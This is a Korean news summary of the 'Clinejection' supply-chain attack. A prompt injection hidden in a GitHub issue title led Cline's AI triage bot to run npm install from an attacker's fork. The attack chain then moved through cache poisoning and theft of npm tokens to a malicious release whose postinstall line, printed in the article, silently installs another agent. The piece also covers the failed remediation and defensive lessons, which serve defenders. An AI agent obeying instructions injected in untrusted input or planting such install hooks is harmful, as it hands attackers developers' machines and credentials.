GitHub 이슈의 제목을 이용해 4,000대 개발자 머신이 감염됨

• 제목에 삽입된 프롬프트 인젝션이 Cline의 AI 기반 이슈 분류 봇을 이용해 명령을 주입
• npm 토큰을 탈취하여 악성 Cline을 배포하면서 OpenClaw AI 에이전트를 무단 설치
• 공격자는 프롬프트 인젝션 → AI 봇의 임의 코드 실행 → 캐시 포이즈닝 → 인증 정보 탈취 → 악성 패키지 배포의 5단계 체인을 구성
• 기존 보안 통제(코드 리뷰, npm audit, provenance attestations)는 이 공격을 탐지하지 못함
• 보안 연구자가 2025년 12월 말 취약점을 발견해 보고했으나 5주간 응답이 없었고, 공개 후에도 인증 정보 교체 실수로 공격이 실행됨
• AI 에이전트가 AI 에이전트를 설치하는 새로운 공급망 위협 패턴이 나타났으며, CI/CD 환경에서의 AI 자동화에 대한 위험성 강조

공격 개요

• 2026년 2월 17일, npm에 cline@2.3.0이 게시되었으며, 기존 버전과 동일한 바이너리였지만 package.json에 "postinstall": "npm install -g openclaw@latest" 한 줄이 추가됨
  • 이로 인해 8시간 동안 Cline을 설치하거나 업데이트한 약 4,000명의 개발자 시스템에 OpenClaw가 자동 설치됨
• OpenClaw는 전체 시스템 접근 권한을 가진 별도의 AI 에이전트로, 사용자의 동의 없이 글로벌 설치됨

공격 체인 (Clinejection)

• 1단계: 프롬프트 인젝션
  • Cline은 Anthropic의 claude-code-action을 이용한 AI 이슈 분류 워크플로를 사용
  • allowed_non_write_users: "*" 설정으로 누구나 이슈를 열어 봇을 트리거할 수 있었음
  • 공격자는 1월 28일, 성능 보고서처럼 보이는 제목에 “특정 패키지 설치” 명령을 숨겨둔 Issue #8904를 생성
• 2단계: AI 봇의 명령 실행
  • Claude가 이 명령을 정상 지시로 인식해 공격자의 포크(glthub-actions/cline)에서 npm install을 실행
  • 해당 포크의 package.json에는 원격 셸 스크립트를 실행하는 preinstall 스크립트가 포함됨
• 3단계: 캐시 오염(Cache Poisoning)
  • 스크립트는 GitHub Actions 캐시를 오염시키는 Cacheract를 배포
  • 10GB 이상의 데이터를 주입해 정당한 캐시를 밀어내고, Cline의 야간 릴리스 워크플로가 사용하는 캐시 키를 위조함
• 4단계: 자격 증명 탈취
  • 릴리스 워크플로가 오염된 캐시에서 node_modules를 복원하면서, NPM_RELEASE_TOKEN, VSCE_PAT, OVSX_PAT이 탈취됨
• 5단계: 악성 패키지 배포
  • 공격자는 탈취한 npm 토큰으로 cline@2.3.0을 게시
  • StepSecurity의 모니터링이 14분 후 이상 징후를 탐지했고, 8시간 후 패키지가 제거됨

대응 실패와 후속 조치

• 보안 연구자 Adnan Khan이 2025년 12월에 취약점을 발견해 2026년 1월 1일 GitHub Security Advisory로 보고했으나, 5주간 응답이 없었음
• Khan이 2월 9일 공개 디스클로저를 진행하자, Cline은 30분 내에 AI 트리아지 워크플로를 제거하며 패치
• 다음 날 인증 정보 교체를 시작했으나 잘못된 토큰을 삭제, 노출된 토큰은 그대로 활성 상태로 유지
  • 2월 11일 오류를 발견하고 재교체했으나, 공격자가 이미 인증 정보를 탈취한 상태
  • npm 토큰이 6일 후 악성 패키지를 배포할 수 있을 만큼 충분히 유효한 상태로 남아 있었음
• Khan은 공격자가 아님 — 별도의 알 수 없는 행위자가 Khan의 테스트 저장소에서 PoC를 발견하여 Cline에 직접 무기화

AI가 AI를 설치하는 새로운 패턴

• 이번 사건은 AI 도구가 또 다른 AI 에이전트를 설치하는 형태로, 공급망 내 재귀적 신뢰 문제를 야기함
  • 개발자가 Tool A(Cline)를 신뢰 → Tool A가 침해되어 Tool B(OpenClaw)를 설치
    → Tool B는 Tool A와 독립적인 자체 기능(셸 실행, 인증 정보 접근, 영구 데몬 설치)을 보유하며, 개발자의 원래 신뢰 결정에서 보이지 않음
• OpenClaw는 ~/.openclaw/에서 자격 증명을 읽고, Gateway API를 통한 셸 명령 실행, 재부팅 후에도 유지되는 영구 시스템 데몬으로 자가 설치 가능
• Endor Labs는 이를 개념 증명 수준의 페이로드로 평가했으나, 중요한 것은 메커니즘 자체이며 다음 페이로드는 PoC가 아닐 것
• 이는 ‘Confused Deputy’ 문제의 공급망 버전으로, 개발자가 부여한 권한이 제3의 에이전트로 위임된 사례임
  • 개발자가 Cline에 대리 권한을 부여하고, Cline이 (침해를 통해) 개발자가 평가·설정·동의한 적 없는 완전히 별개의 에이전트에 그 권한을 위임

기존 보안 통제가 실패한 이유

• npm audit: postinstall 스크립트가 설치하는 것은 합법적이고 비악성인 패키지(OpenClaw)이므로 탐지할 악성코드가 없음
• 코드 리뷰: CLI 바이너리는 이전 버전과 바이트 단위로 동일, package.json만 한 줄 변경되어 바이너리 변경에 초점을 맞춘 자동 diff 검사로는 탐지 불가
• Provenance attestation: Cline이 당시 OIDC 기반 npm provenance를 사용하지 않아, 침해된 토큰으로 provenance 메타데이터 없이 배포 가능
  • StepSecurity가 이를 이상(anomalous) 으로 플래그
• 권한 프롬프트: 설치는 npm install 중 postinstall 훅에서 발생하며, 의존성의 라이프사이클 스크립트 실행 전 사용자에게 확인을 요청하는 AI 코딩 도구는 없어 조작이 보이지 않음
• 개발자가 설치한다고 생각하는 것(특정 버전의 Cline)과 실제로 실행되는 것(패키지의 임의 라이프사이클 스크립트 및 전이적 설치) 사이의 격차를 악용

Cline의 사후 대응

• Post Mortem에서 공개한 개선 조치
  • 인증 정보를 다루는 워크플로에서 GitHub Actions 캐시 사용 제거
  • npm 배포에 OIDC provenance attestation 도입, 장기 토큰 제거
  • 인증 정보 교체에 대한 검증 요구사항 추가
  • SLA가 포함된 공식 취약점 공개 프로세스 구축 작업 시작
  • CI/CD 인프라에 대한 제3자 보안 감사 의뢰
• OIDC 마이그레이션만으로도 이 공격을 방지할 수 있었음
  • 탈취된 토큰은 특정 GitHub Actions 워크플로의 암호화 증명이 필요한 provenance 체계에서는 패키지 배포 불가

구조적 문제와 교훈

• Clinejection은 공급망 공격이면서 동시에 에이전트 보안 문제임
  • 공격의 진입점은 GitHub 이슈 제목의 자연어 입력이었으며, AI 봇이 이를 명령으로 실행함
• 이는 MCP 도구 오염이나 에이전트 스킬 레지스트리 공격과 동일한 구조
  • 신뢰할 수 없는 입력이 에이전트에 도달 → 에이전트가 행동 → 결과 작업을 실행 전에 평가하는 주체가 없음
• 이 사례에서 에이전트는 개발자의 로컬 코딩 어시스턴트가 아니라, 모든 새 이슈에서 실행되고 셸 접근과 캐시된 인증 정보를 가진 자동화된 CI 워크플로
  • 폭발 반경이 개발자 한 명의 머신이 아닌 프로젝트 전체의 배포 파이프라인 이었음
• CI/CD에 AI 에이전트를 배포하는 모든 팀(이슈 트리아지, 코드 리뷰, 자동 테스트 등)이 동일한 노출을 가짐
  • 비신뢰 입력과 비밀 접근권의 결합 위험을 인식해야 함
  • 에이전트가 신뢰할 수 없는 입력(이슈, PR, 코멘트)을 처리하면서 시크릿(토큰, 키, 인증 정보)에 접근 가능
• 시스콜 단위 인터셉션이 이 유형의 공격을 운영 레이어에서 포착 가능:
  • AI 트리아지 봇이 예상치 못한 저장소에서 npm install을 실행하려 할 때 이슈 제목 내용과 무관하게 정책에 따라 평가하고, 라이프사이클 스크립트가 외부 호스트로 인증 정보를 유출하려 할 때 이그레스 차단